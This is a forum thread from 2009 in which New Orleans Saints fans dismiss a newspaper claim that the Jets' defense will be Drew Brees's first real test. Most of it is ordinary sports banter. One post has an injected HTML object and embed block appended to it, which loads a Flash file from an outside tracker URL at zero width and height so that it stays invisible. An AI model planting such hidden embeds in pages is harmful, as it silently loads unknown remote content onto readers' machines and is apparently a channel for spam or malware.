Saints quarterback Drew Brees could be in for 1st test against Jets' 'D' (1 Viewer)

gw504saints

Very Banned
Reaction score
The Jets aren't just beating big-name quarterbacks, they're tormenting them. Look beyond the sack total (four), and check out the number of quarterback hits - 30. They're on a 160-hit pace, which would be more than twice last season's total (70). And they haven't had their best pass rusher, Calvin Pace, who is serving a four-game league suspension.

http://www.nydailynews.com/sports/football/jets/2009/10/02/2009-10-02_drew_brees.html

Besides Brady (who was beat by his own WRs, IMO) who do they consider big name? Kerry Collins?

Besides Brady (who was beat by his own WRs, IMO) who do they consider big name? Kerry Collins?

matt schaub
tom brady
kerry collins

i dunno... none of those match brees... also... no team has scored more than 17 on them...

brees will torch them...

The writer's article title says it all:

Saints quarterback Drew Brees could be in for 1st test against Jets' 'D'

If he/she did any research, he would already know that Drew was tested last week by Buffalo's D, and the smartest thing Drew did was not to throw any ints, and let our D and running game win it for us.

A "wishful thinking" feel-good story for the Jets faithful.

Whatever!

the philli D was suppossed to be his "first test"
we played against what was suppossed to be a decent Bill's D

Sure the Jets will be the Best D we have played, and right now it looks like they may be the best D we play all season but to say this is the first test shows the writer knows nothing outside of NY.

Brees has been tested, and he passes these tests with soaring numbers. I expect he will do so again this weekend

Brady isn't fully recovered yet. It takes awhile for a QB to shake off the rust, just look at what Carson Palmer was like after he returned from a similar injury. Collins and Schaub are mediocre at best, so I wouldn't say the Jets have really faced the best QBs in the league. That'll change this Sunday, however, when Brees shreds their defense and continues his march towards the League MVP

First test?? What, now Brees is a rookie??<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4730"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4730" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Stupid.

Yeah really, plus the will be without 2 of there DB for this game. Bress will light them up!!!

Yeah, like we've never faced a top of the line D before. We were supposed to be in for the game of our lives last year vs the Packers and their #1 passing defense. And then we dropped 51 on them.

We'll either light up the score board or we won't. If the Jets dominate our offense, it won't be cuz Brees hasn't faced a defense this good before.

The Jets are gonna get theirs on D. Its really a matter of how the Saints can adjust to the pressure and protect the ball.

It will be a tough game, Brees will get hit, sacked...but he is to smart to be baited into mistakes and they have to stop our run game...a good run game is the perfect weapon against a blitzing defense...if they shut down our run game, then they can peel there ears back and do what they do best....same with us...lol..feels good to say that.

Every week in the NFL you face professionals, so you have to perform. It's all about match-ups and game planning, or your ability to adjust your game plan if the original one isn't working. It's easier for a offense (I think, not wanting argue) to adjust their play calling than for a defense to change it's shceme once the game has started. Exhibit one, the Saints last week. The Bills prepared for us to throw, throw, throw, and due to that and the wind, we changed in the second half to the run and took over the game. This week will be no different! We will make adjustments based on what they do, and they will try and counter and it just comes down to who does the best at coaching, making the calls and then execution on the field. My bet is on Payton and Brees everytime, everyweek. Geaux Saints.

I'm ready for this game NOW! I'm tired of all the talk, its time for some ball.

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Already have an account? Log in here.

Users who are viewing this thread

Back
    Top Bottom